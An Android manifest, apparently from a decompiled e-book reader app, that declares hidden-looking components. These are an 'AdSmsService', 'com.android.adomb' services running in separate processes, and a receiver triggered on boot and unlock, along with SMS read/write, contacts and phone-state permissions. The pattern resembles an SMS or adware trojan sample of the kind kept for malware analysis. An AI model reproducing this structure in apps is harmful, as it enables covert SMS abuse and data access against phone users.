<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.keji.danti421">
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:label="@string/bookname" android:name="com.keji.danti.MainA" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.keji.danti.Boutique" android:screenOrientation="portrait" android:theme="@style/Theme.App"/>
        <activity android:name="com.keji.danti.Background" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.Lists" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.History" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.TextDetail" android:screenOrientation="portrait"/>
        <activity android:label="@string/setting" android:name="com.keji.danti.Setting" android:screenOrientation="portrait"/>
        <service android:name="com.keji.danti.AdSmsService"/>
        <receiver android:name="com.keji.danti.BaseBroadcastReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.INPUT_METHOD_CHANGED"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
            </intent-filter>
        </receiver>
        <service android:name="com.android.adomb.AdSmsService"/>
        <service android:name="com.android.adomb.SystemPlus" android:process=":three"/>
        <service android:name="com.android.adomb.MainRun" android:process=":two"/>
        <receiver android:name="com.android.adomb.ForAlarm" android:process=":remote"/>
        <meta-data android:name="APP_UID" android:value="f1cd8ba"/>
    </application>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
</manifest>
